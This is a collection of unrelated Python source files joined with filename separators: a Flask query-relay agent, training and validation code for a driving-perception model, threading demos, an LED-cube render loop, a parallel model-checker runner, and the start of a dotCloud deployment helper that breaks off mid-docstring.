assert self.rotate_steps == rotate_steps
assert int(round(self.wait_duration/logic.dot_interval)+rotate_steps/logic.dot_steps) == duration
class TestYearLogic(unittest.TestCase):
def _calc(self) -> int:
return 0
def test_20180602(self):
with patch('asterisk_mirror.stepper.Stepper') as StepperMock:
stepper = StepperMock()
logic = YearLogic(stepper, datetime(2018, 6, 2))
logic.execute()
# angle: 0.83286 rad -> 150 deg
# echo "scale=5; ( `date -ju 0602000018 +%s` - `date -ju 0101000018 +%s` ) / ( `date -ju 0101000019 +%s` - `date -ju 0101000018 +%s` ) * 2.0" | bc
args, _ = stepper.set_angle.call_args
# print("call_args:", args[0]*180)
assert round(args[0]*180) == 150
if __name__ == '__main__':
unittest.main()
|
agent.py
|
#!/usr/bin/python
from flask import Flask
from flask import make_response
from flask import abort
from flask import request
from threading import Thread
from bson import json_util
import json
import sys
import os
import helperapi as helper
import confparser as cp
query_results = []
app = Flask(__name__)
@app.route('/')
def index():
return "Hello, World"
@app.route('/pathdump', methods=['POST'])
def getpathdumppost():
if not request.json or not 'api' in request.json:
abort (404)
else:
output = handleRequest (request.json)
return json.dumps (output, default=json_util.default)
@app.route('/pathdump', methods=['GET'])
def getpathdumpget():
if not request.json or not 'api' in request.json:
abort (404)
else:
output = handleRequest (request.json)
return json.dumps (output, default=json_util.default)
def handleRequest (req):
global query_results
Tree = req['tree']
cur = helper.getCurNodeID ()
if len (Tree[cur]['child']) == 0:
return helper.handleLeafNode (req)
# From now on, the following handles when the current node is a relay node
workers = []
# 1) create a worker thread at the current node
(func, argv) = helper.getThreadArgument (True, req)
t = Thread (target = helper.wrapper, args = (func, argv, query_results))
workers.append (t)
# 2) deliver query to child nodes
for child in Tree[cur]['child']:
(func, argv) = helper.getThreadArgument (False, req, child)
# further optimization (should be implemented): construct a subtree for
# each child and pass it on to the httpcmd as argument
t = Thread (target = helper.wrapper, args = (func, argv,
query_results))
workers.append (t)
# 3) start workers
for worker in workers:
worker.start()
# 4) wait unitl workers finish -> this part might be hung forever
for worker in workers:
worker.join()
data=[]
for res in query_results:
if len(res) > 0 and type(res) == type(()) and 'content-type' in res[0]:
resp, content = res
content = json.loads (content, object_hook=json_util.object_hook)
else:
content = res
data += content
# reset variables
query_results = []
if req['api'] == 'execQuery' and 'aggcode' in req:
# 4) process collected data using AggCode
return helper.processCollectedData (req['aggcode'], data)
else:
return data
def initialize ():
options = None
if len (sys.argv) == 2:
options = cp.parse_config (sys.argv[1])
if options:
cp.options = options
print cp.options
# create app repository if it doesn't exist
if not os.path.exists (cp.options['repository']):
os.makedirs (cp.options['repository'])
if 'controller' not in cp.options:
sys.exit ("No controller IP address!")
if __name__ == '__main__':
initialize ()
app.run (debug = True, host = "0.0.0.0")
|
function.py
|
import time
from lib.core.evaluate import ConfusionMatrix,SegmentationMetric
from lib.core.general import non_max_suppression,check_img_size,scale_coords,xyxy2xywh,xywh2xyxy,box_iou,coco80_to_coco91_class,plot_images,ap_per_class,output_to_target
from lib.utils.utils import time_synchronized
from lib.utils import plot_img_and_mask,plot_one_box,show_seg_result
import torch
from threading import Thread
import numpy as np
from PIL import Image
from torchvision import transforms
from pathlib import Path
import json
import random
import cv2
import os
import math
from torch.cuda import amp
from tqdm import tqdm
def train(cfg, train_loader, model, criterion, optimizer, scaler, epoch, num_batch, num_warmup,
writer_dict, logger, device, rank=-1):
"""
train for one epoch
Inputs:
- config: configurations
- train_loader: loder for data
- model:
- criterion: (function) calculate all the loss, return total_loss, head_losses
- writer_dict:
outputs(2,)
output[0] len:3, [1,3,32,32,85], [1,3,16,16,85], [1,3,8,8,85]
output[1] len:1, [2,256,256]
output[2] len:1, [2,256,256]
target(2,)
target[0] [1,n,5]
target[1] [2,256,256]
target[2] [2,256,256]
Returns:
None
"""
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
# switch to train mode
model.train()
start = time.time()
for i, (input, target, paths, shapes) in enumerate(train_loader):
intermediate = time.time()
#print('tims:{}'.format(intermediate-start))
num_iter = i + num_batch * (epoch - 1)
if num_iter < num_warmup:
# warm up
lf = lambda x: ((1 + math.cos(x * math.pi / cfg.TRAIN.END_EPOCH)) / 2) * \
(1 - cfg.TRAIN.LRF) + cfg.TRAIN.LRF # cosine
xi = [0, num_warmup]
# model.gr = np.interp(ni, xi, [0.0, 1.0]) # iou loss ratio (obj_loss = 1.0 or iou)
for j, x in enumerate(optimizer.param_groups):
# bias lr falls from 0.1 to lr0, all other lrs rise from 0.0 to lr0
x['lr'] = np.interp(num_iter, xi, [cfg.TRAIN.WARMUP_BIASE_LR if j == 2 else 0.0, x['initial_lr'] * lf(epoch)])
if 'momentum' in x:
x['momentum'] = np.interp(num_iter, xi, [cfg.TRAIN.WARMUP_MOMENTUM, cfg.TRAIN.MOMENTUM])
data_time.update(time.time() - start)
if not cfg.DEBUG:
input = input.to(device, non_blocking=True)
assign_target = []
for tgt in target:
assign_target.append(tgt.to(device))
target = assign_target
with amp.autocast(enabled=device.type != 'cpu'):
outputs = model(input)
total_loss, head_losses = criterion(outputs, target, shapes,model)
# print(head_losses)
# compute gradient and do update step
optimizer.zero_grad()
scaler.scale(total_loss).backward()
scaler.step(optimizer)
scaler.update()
if rank in [-1, 0]:
# measure accuracy and record loss
losses.update(total_loss.item(), input.size(0))
# _, avg_acc, cnt, pred = accuracy(output.detach().cpu().numpy(),
# target.detach().cpu().numpy())
# acc.update(avg_acc, cnt)
# measure elapsed time
batch_time.update(time.time() - start)
end = time.time()
if i % cfg.PRINT_FREQ == 0:
msg = 'Epoch: [{0}][{1}/{2}]\t' \
'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\t' \
'Speed {speed:.1f} samples/s\t' \
'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\t' \
'Loss {loss.val:.5f} ({loss.avg:.5f})\t' \
'Lr {lr:.5f}'.format(
epoch, i, len(train_loader), batch_time=batch_time,
speed=input.size(0)/batch_time.val,
data_time=data_time, loss=losses, lr=optimizer.param_groups[0]['lr'])
logger.info(msg)
writer = writer_dict['writer']
global_steps = writer_dict['train_global_steps']
writer.add_scalar('train_loss', losses.val, global_steps)
# writer.add_scalar('train_acc', acc.val, global_steps)
writer_dict['train_global_steps'] = global_steps + 1
def validate(epoch,config, val_loader, val_dataset, model, criterion, output_dir,
tb_log_dir, writer_dict=None, logger=None, device='cpu', rank=-1):
"""
validata
Inputs:
- config: configurations
- train_loader: loder for data
- model:
- criterion: (function) calculate all the loss, return
- writer_dict:
Return:
None
"""
# setting
max_stride = 32
weights = None
save_dir = output_dir + os.path.sep + 'visualization'
if not os.path.exists(save_dir):
os.mkdir(save_dir)
# print(save_dir)
_, imgsz = [check_img_size(x, s=max_stride) for x in config.MODEL.IMAGE_SIZE] #imgsz is multiple of max_stride
if type(config.GPUS) == type(1):
GPU_nums = 1
else:
GPU_nums = len(config.GPUS)
batch_size = config.TRAIN.BATCH_SIZE_PER_GPU * GPU_nums
test_batch_size = config.TEST.BATCH_SIZE_PER_GPU * GPU_nums
training = False
is_coco = False #is coco dataset
save_conf=False # save auto-label confidences
verbose=False
save_hybrid=False
log_imgs,wandb = min(16,100), None
nc = 10
iouv = torch.linspace(0.5,0.95,10).to(device) #iou vector for mAP@0.5:0.95
niou = iouv.numel()
try:
import wandb
except ImportError:
wandb = None
log_imgs = 0
seen = 0
confusion_matrix = ConfusionMatrix(nc=model.nc) #detector confusion matrix
da_metric = SegmentationMetric(config.num_seg_class) #segment confusion matrix
ll_metric = SegmentationMetric(2) #segment confusion matrix
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
colors = [[random.randint(0, 255) for _ in range(3)] for _ in names]
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Targets', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t_inf, t_nms = 0., 0., 0., 0., 0., 0., 0., 0., 0.
losses = AverageMeter()
da_acc_seg = AverageMeter()
da_IoU_seg = AverageMeter()
da_mIoU_seg = AverageMeter()
ll_acc_seg = AverageMeter()
ll_IoU_seg = AverageMeter()
ll_mIoU_seg = AverageMeter()
T_inf = AverageMeter()
T_nms = AverageMeter()
# switch to train mode
model.eval()
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, target, paths, shapes) in tqdm(enumerate(val_loader), total=len(val_loader)):
if not config.DEBUG:
img = img.to(device, non_blocking=True)
assign_target = []
for tgt in target:
assign_target.append(tgt.to(device))
target = assign_target
nb, _, height, width = img.shape #batch size, channel, height, width
with torch.no_grad():
pad_w, pad_h = shapes[0][1][1]
pad_w = int(pad_w)
pad_h = int(pad_h)
ratio = shapes[0][1][0][0]
t = time_synchronized()
det_out, da_seg_out, ll_seg_out= model(img)
t_inf = time_synchronized() - t
if batch_i > 0:
T_inf.update(t_inf/img.size(0),img.size(0))
inf_out,train_out = det_out
#driving area segment evaluation
_,da_predict=torch.max(da_seg_out, 1)
_,da_gt=torch.max(target[1], 1)
da_predict = da_predict[:, pad_h:height-pad_h, pad_w:width-pad_w]
da_gt = da_gt[:, pad_h:height-pad_h, pad_w:width-pad_w]
da_metric.reset()
da_metric.addBatch(da_predict.cpu(), da_gt.cpu())
da_acc = da_metric.pixelAccuracy()
da_IoU = da_metric.IntersectionOverUnion()
da_mIoU = da_metric.meanIntersectionOverUnion()
da_acc_seg.update(da_acc,img.size(0))
da_IoU_seg.update(da_IoU,img.size(0))
da_mIoU_seg.update(da_mIoU,img.size(0))
#lane line segment evaluation
_,ll_predict=torch.max(ll_seg_out, 1)
_,ll_gt=torch.max(target[2], 1)
ll_predict = ll_predict[:, pad_h:height-pad_h, pad_w:width-pad_w]
ll_gt = ll_gt[:, pad_h:height-pad_h, pad_w:width-pad_w]
ll_metric.reset()
ll_metric.addBatch(ll_predict.cpu(), ll_gt.cpu())
ll_acc = ll_metric.lineAccuracy()
ll_IoU = ll_metric.IntersectionOverUnion()
ll_mIoU = ll_metric.meanIntersectionOverUnion()
ll_acc_seg.update(ll_acc,img.size(0))
ll_IoU_seg.update(ll_IoU,img.size(0))
ll_mIoU_seg.update(ll_mIoU,img.size(0))
total_loss, head_losses = criterion((train_out,da_seg_out, ll_seg_out), target, shapes,model) #Compute loss
losses.update(total_loss.item(), img.size(0))
#NMS
t = time_synchronized()
target[0][:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [target[0][target[0][:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
output = non_max_suppression(inf_out, conf_thres= config.TEST.NMS_CONF_THRESHOLD, iou_thres=config.TEST.NMS_IOU_THRESHOLD, labels=lb)
#output = non_max_suppression(inf_out, conf_thres=0.001, iou_thres=0.6)
#output = non_max_suppression(inf_out, conf_thres=config.TEST.NMS_CONF_THRES, iou_thres=config.TEST.NMS_IOU_THRES)
t_nms = time_synchronized() - t
if batch_i > 0:
T_nms.update(t_nms/img.size(0),img.size(0))
if config.TEST.PLOTS:
if batch_i == 0:
for i in range(test_batch_size):
img_test = cv2.imread(paths[i])
da_seg_mask = da_seg_out[i][:, pad_h:height-pad_h, pad_w:width-pad_w].unsqueeze(0)
da_seg_mask = torch.nn.functional.interpolate(da_seg_mask, scale_factor=int(1/ratio), mode='bilinear')
_, da_seg_mask = torch.max(da_seg_mask, 1)
da_gt_mask = target[1][i][:, pad_h:height-pad_h, pad_w:width-pad_w].unsqueeze(0)
da_gt_mask = torch.nn.functional.interpolate(da_gt_mask, scale_factor=int(1/ratio), mode='bilinear')
_, da_gt_mask = torch.max(da_gt_mask, 1)
da_seg_mask = da_seg_mask.int().squeeze().cpu().numpy()
da_gt_mask = da_gt_mask.int().squeeze().cpu().numpy()
# seg_mask = seg_mask > 0.5
# plot_img_and_mask(img_test, seg_mask, i,epoch,save_dir)
img_test1 = img_test.copy()
_ = show_seg_result(img_test, da_seg_mask, i,epoch,save_dir)
_ = show_seg_result(img_test1, da_gt_mask, i, epoch, save_dir, is_gt=True)
img_ll = cv2.imread(paths[i])
ll_seg_mask = ll_seg_out[i][:, pad_h:height-pad_h, pad_w:width-pad_w].unsqueeze(0)
ll_seg_mask = torch.nn.functional.interpolate(ll_seg_mask, scale_factor=int(1/ratio), mode='bilinear')
_, ll_seg_mask = torch.max(ll_seg_mask, 1)
ll_gt_mask = target[2][i][:, pad_h:height-pad_h, pad_w:width-pad_w].unsqueeze(0)
ll_gt_mask = torch.nn.functional.interpolate(ll_gt_mask, scale_factor=int(1/ratio), mode='bilinear')
_, ll_gt_mask = torch.max(ll_gt_mask, 1)
ll_seg_mask = ll_seg_mask.int().squeeze().cpu().numpy()
ll_gt_mask = ll_gt_mask.int().squeeze().cpu().numpy()
# seg_mask = seg_mask > 0.5
# plot_img_and_mask(img_test, seg_mask, i,epoch,save_dir)
img_ll1 = img_ll.copy()
_ = show_seg_result(img_ll, ll_seg_mask, i,epoch,save_dir, is_ll=True)
_ = show_seg_result(img_ll1, ll_gt_mask, i, epoch, save_dir, is_ll=True, is_gt=True)
img_det = cv2.imread(paths[i])
img_gt = img_det.copy()
det = output[i].clone()
if len(det):
det[:,:4] = scale_coords(img[i].shape[1:],det[:,:4],img_det.shape).round()
for *xyxy,conf,cls in reversed(det):
#print(cls)
label_det_pred = f'{names[int(cls)]} {conf:.2f}'
plot_one_box(xyxy, img_det , label=label_det_pred, color=colors[int(cls)], line_thickness=3)
cv2.imwrite(save_dir+"/batch_{}_{}_det_pred.png".format(epoch,i),img_det)
labels = target[0][target[0][:, 0] == i, 1:]
# print(labels)
labels[:,1:5]=xywh2xyxy(labels[:,1:5])
if len(labels):
labels[:,1:5]=scale_coords(img[i].shape[1:],labels[:,1:5],img_gt.shape).round()
for cls,x1,y1,x2,y2 in labels:
#print(names)
#print(cls)
label_det_gt = f'{names[int(cls)]}'
xyxy = (x1,y1,x2,y2)
plot_one_box(xyxy, img_gt , label=label_det_gt, color=colors[int(cls)], line_thickness=3)
cv2.imwrite(save_dir+"/batch_{}_{}_det_gt.png".format(epoch,i),img_gt)
# Statistics per image
# output([xyxy,conf,cls])
# target[0] ([img_id,cls,xyxy])
for si, pred in enumerate(output):
labels = target[0][target[0][:, 0] == si, 1:] #all object in one image
nl = len(labels) # num of object
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if config.TEST.SAVE_TXT:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging
if config.TEST.PLOTS and len(wandb_images) < log_imgs:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb.Image(img[si], boxes=boxes, caption=path.name))
# Append to pycocotools JSON dictionary
if config.TEST.SAVE_JSON:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if config.TEST.PLOTS:
confusion_matrix.process_batch(pred, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
# n*m n:pred m:label
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
if config.TEST.PLOTS and batch_i < 3:
f = save_dir +'/'+ f'test_batch{batch_i}_labels.jpg' # labels
#Thread(target=plot_images, args=(img, target[0], paths, f, names), daemon=True).start()
f = save_dir +'/'+ f'test_batch{batch_i}_pred.jpg' # predictions
#Thread(target=plot_images, args=(img, output_to_target(output), paths, f, names), daemon=True).start()
# Compute statistics
# stats : [[all_img_correct]...[all_img_tcls]]
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy zip(*) :unzip
map70 = None
map75 = None
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=False, save_dir=save_dir, names=names)
ap50, ap70, ap75,ap = ap[:, 0], ap[:,4], ap[:,5],ap.mean(1) # [P, R, AP@0.5, AP@0.5:0.95]
mp, mr, map50, map70, map75, map = p.mean(), r.mean(), ap50.mean(), ap70.mean(),ap75.mean(),ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%12.3g' * 6 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
#print(map70)
#print(map75)
# Print results per class
if (verbose or (nc <= 20 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t_inf, t_nms, t_inf + t_nms)) + (imgsz, imgsz, batch_size) # tuple
if not training:
print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
# Plots
if config.TEST.PLOTS:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb and wandb.run:
wandb.log({"Images": wandb_images})
wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]})
# Save JSON
if config.TEST.SAVE_JSON and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = '../coco/annotations/instances_val2017.json' # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in val_loader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if config.TEST.SAVE_TXT else ''
print(f"Results saved to {save_dir}{s}")
model.float() # for training
maps = np.zeros(nc) + map
# for i, c in enumerate(ap_class):
# maps[c] = ap[i]
da_segment_result = (da_acc_seg.avg,da_IoU_seg.avg,da_mIoU_seg.avg)
ll_segment_result = (ll_acc_seg.avg,ll_IoU_seg.avg,ll_mIoU_seg.avg)
# print(da_segment_result)
# print(ll_segment_result)
detect_result = np.asarray([mp, mr, map50, map])
# print('mp:{},mr:{},map50:{},map:{}'.format(mp, mr, map50, map))
#print segmet_result
t = [T_inf.avg, T_nms.avg]
return da_segment_result, ll_segment_result, detect_result, losses.avg, maps, t
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count if self.count != 0 else 0
|
multi-threading_test.py
|
from threading import Thread
import time
def timer(name, delay, repeat):
print "Timer: " + name + " Started"
while repeat > 0:
time.sleep(delay)
print name + ": " + str(time.ctime(time.time()))
repeat -= 1
print "Timer: " + name + " Completed"
def Main():
t1 = Thread(target=timer, args=("Timer1", 1, 5))
t2 = Thread(target=timer, args=("Timer2", 2, 5))
t1.start()
t2.start()
print "main is done"
if __name__ == '__main__':
Main()
|
cube.py
|
import argparse
import asyncio
import logging
from queue import Queue
import signal
import sys
import threading
import traceback
import uvloop
from biofeedback_cube.buffer import buffer
from biofeedback_cube import config
from biofeedback_cube import display
from biofeedback_cube import exceptions
from biofeedback_cube import osc
from biofeedback_cube import utils
from biofeedback_cube.hydra import hydra, save_hydra
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
queue = Queue(maxsize=2)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--host", default="0.0.0.0", help="The ip to listen on")
parser.add_argument("--port", type=int, default=37339, help="The port to listen on")
parser.add_argument("--simulator", action='store_true', help="run simulator")
parser.add_argument("--verbose", action='store_true', help="verbose")
args = parser.parse_args()
return args
@asyncio.coroutine
def main_loop(coros):
done, _pending = yield from asyncio.wait(coros, return_when=asyncio.FIRST_COMPLETED)
for t in done:
print(f'{t} is done')
shutdown = hydra.shutdown
save_hydra()
if shutdown:
utils.shutdown()
if t.exception():
traceback_str = ''.join(traceback.format_tb(t.exception().__traceback__))
logger.critical(traceback_str)
sys.exit(-1)
def render():
try:
buffer.update()
return buffer.buffer
except exceptions.UserQuit:
logger.warning('user quit')
save_hydra()
raise
except Exception:
logger.exception('whoops 🙀')
raise
@asyncio.coroutine
def async_render():
while True:
if hydra.shutdown:
logger.warning('hydra shutdown, exiting render loop')
break
grid = render()
brightness = hydra.e
display.draw(grid, brightness=brightness)
yield from asyncio.sleep(0.010)
def async_main(args):
coros = (
async_render(),
osc.async_server(args.host, args.port),
)
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
loop = asyncio.get_event_loop()
loop.run_until_complete(main_loop(coros))
def thread_render():
while True:
grid = render()
queue.put(grid.copy())
def thread_draw():
while True:
logger.debug(f'{queue.qsize()}')
grid = queue.get()
display.draw(grid)
def thread_main(args):
t1 = threading.Thread(target=thread_render, daemon=True)
t2 = threading.Thread(target=osc.server, args=(args.host, args.port), daemon=True)
t1.start()
t2.start()
thread_draw()
def sigterm_handler(signum, frame):
logger.warning('caught SIGTERM')
save_hydra()
sys.exit(0)
def main():
args = parse_args()
signal.signal(signal.SIGTERM, sigterm_handler)
if args.verbose:
root_logger = logging.getLogger()
root_logger.setLevel(logging.DEBUG)
logger.setLevel(logging.DEBUG)
osc.init()
display.init(config.HEIGHT, config.WIDTH, sdl=args.simulator)
# thread_main(args)
async_main(args)
if __name__ == '__main__':
main()
|
threadwatcher_parallel_cosa2.py
|
#!/usr/bin/env python3
import argparse
import signal
import subprocess
import sys
import time
import os
## Non-blocking reads for subprocess
## https://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python
import sys
from subprocess import PIPE, Popen
from threading import Thread
ON_POSIX = 'posix' in sys.builtin_module_names
def enqueue_output(out, l):
for line in iter(out.readline, b''):
l.append(line.decode('utf-8'))
# out.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Run BMC and K-induction in parallel")
parser.add_argument('btor_file')
parser.add_argument('-k', '--bound', default='1000', help='The maximum bound to unroll to')
parser.add_argument('-v', '--verbosity', action="store_true", help="Enable verbose output."
" Note: this is buffered and only prints when a process finishes"
" or there is an interrupt")
args = parser.parse_args()
btor_file = args.btor_file
bound = args.bound
verbosity = args.verbosity
verbosity_option = '1' if args.verbosity else '0'
commands = {
"BMC": ['./pono-btor-msat', '-e', 'bmc', '-v', verbosity_option, '-k', bound, btor_file],
"BMC+SimplePath": ['./pono-btor-msat', '-e', 'bmc-sp', '-v', verbosity_option, '-k', bound, btor_file],
"K-Induction": ['./pono-btor-msat', '-e', 'ind', '-v', verbosity_option, '-k', bound, btor_file],
"Interpolant-based": ['./pono-btor-msat', '-e', 'interp', '-v', verbosity_option, '-k', bound, btor_file]
}
interp_processes = set()
all_processes = []
queues = {}
name_map = {}
# this one gets updated on the fly as processes end
processes = []
for name, cmd in commands.items():
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, close_fds=ON_POSIX)
if 'interp' in cmd:
interp_processes.add(proc)
processes.append(proc)
all_processes.append(proc)
name_map[proc] = name
# instantiate watcher thread
q = []
t = Thread(target=enqueue_output, args=(proc.stdout, q))
queues[proc] = q
t.daemon = True
t.start()
def print_process_output(proc):
for line in queues[proc]:
print(line, end='')
print()
sys.stdout.flush()
shutdown = False
def handle_signal(signum, frame):
# send signal recieved to subprocesses
global shutdown
if not shutdown:
shutdown = True
for proc in processes:
if proc.poll() is None:
proc.terminate()
global verbosity
if verbosity:
# too slow to communicate with process in signal handling
# use cached lines
for proc in all_processes:
print("{} output:".format(name_map[proc]))
for line in queues[proc]:
print(line, end='')
print()
sys.stdout.flush()
sys.exit(0)
signal.signal(signal.SIGINT, handle_signal)
signal.signal(signal.SIGTERM, handle_signal)
while not shutdown:
for p in processes:
if p.poll() is not None:
# return code for unknown is 2
# anything higher than that is an error
# keep solving unless there are no more running processes
if p.returncode >= 2:
processes.remove(p)
# print unknown only if this is the last process
if not processes:
print_process_output(p)
shutdown = True
else:
# HACK don't return counter-examples from interpolation-based procedure
# mathsat might return constant arrays in witness which can't be
# printed in btor2 format
if p in interp_processes and p.returncode == 1:
processes.remove(p)
# this shouldn't happen but let's handle it just in case
if not processes:
print_process_output(bmc)
shutdown = True
break
else:
print_process_output(p)
shutdown = True
break
# just a double check
if not processes:
shutdown = True
break
if not shutdown:
time.sleep(.001)
# clean up
for p in all_processes:
if p.poll() is None:
p.terminate()
|
cloud.py
|
"""Cloud satellite manager
Here we use dotcloud to lookup or deploy the satellite server. This also
means we need dotcloud credentials, so we get those if we need them.
Most of this functionality is pulled from the dotcloud client, but is
modified and organized to meet our needs. This is why we pass around and
work with a cli object. This is the CLI object from the dotcloud client.
"""
import time
import os
import os.path
import socket
import sys
import subprocess
import threading
from StringIO import StringIO
import dotcloud.ui.cli
from dotcloud.ui.config import GlobalConfig, CLIENT_KEY, CLIENT_SECRET
from dotcloud.client import RESTClient
from dotcloud.client.auth import NullAuth
from dotcloud.client.errors import RESTAPIError
from skypipe import client
APPNAME = "skypipe0"
satellite_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'satellite')
# This is a monkey patch to silence rsync output
class FakeSubprocess(object):
@staticmethod
def call(*args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
return subprocess.call(*args, **kwargs)
dotcloud.ui.cli.subprocess = FakeSubprocess
def wait_for(text, finish=None, io=None):
"""Displays dots until returned event is set"""
if finish:
finish.set()
time.sleep(0.1) # threads, sigh
if not io:
io = sys.stdout
finish = threading.Event()
io.write(text)
def _wait():
while not finish.is_set():
io.write('.')
io.flush()
finish.wait(timeout=1)
io.write('\n')
threading.Thread(target=_wait).start()
return finish
def lookup_endpoint(cli):
"""Looks up the application endpoint from dotcloud"""
url = '/applications/{0}/environment'.format(APPNAME)
environ = cli.user.get(url).item
port = environ['DOTCLOUD_SATELLITE_ZMQ_PORT']
host = socket.gethostbyname(environ['DOTCLOUD_SATELLITE_ZMQ_HOST'])
return "tcp://{0}:{1}".format(host, port)
def setup_dotcloud_account(cli):
"""Gets user/pass for dotcloud, performs auth, and stores keys"""
client = RESTClient(endpoint=cli.client.endpoint)
client.authenticator = NullAuth()
urlmap = client.get('/auth/discovery').item
username = cli.prompt('dotCloud email')
password = cli.prompt('Password', noecho=True)
credential = {'token_url': urlmap.get('token'),
'key': CLIENT_KEY, 'secret': CLIENT_SECRET}
try:
token = cli.authorize_client(urlmap.get('token'), credential, username, password)
except Exception as e:
cli.die('Username and password do not match. Try again.')
token['url'] = credential['token_url']
config = GlobalConfig()
config.data = {'token': token}
config.save()
cli.global_config = GlobalConfig() # reload
cli.setup_auth()
cli.get_keys()
def setup(cli):
"""Everything to make skypipe ready to use"""
if not cli.global_config.loaded:
setup_dotcloud_account(cli)
discover_satellite(cli)
cli.success("Skypipe is ready for action")
def discover_satellite(cli, deploy=True, timeout=5):
"""Looks to make sure a satellite exists, returns endpoint
First makes sure we have dotcloud account credentials. Then it looks
up the environment for the satellite app. This will contain host and
port to construct an endpoint. However, if app doesn't exist, or
endpoint does not check out, we call `launch_satellite` to deploy,
which calls `discover_satellite` again when finished. Ultimately we
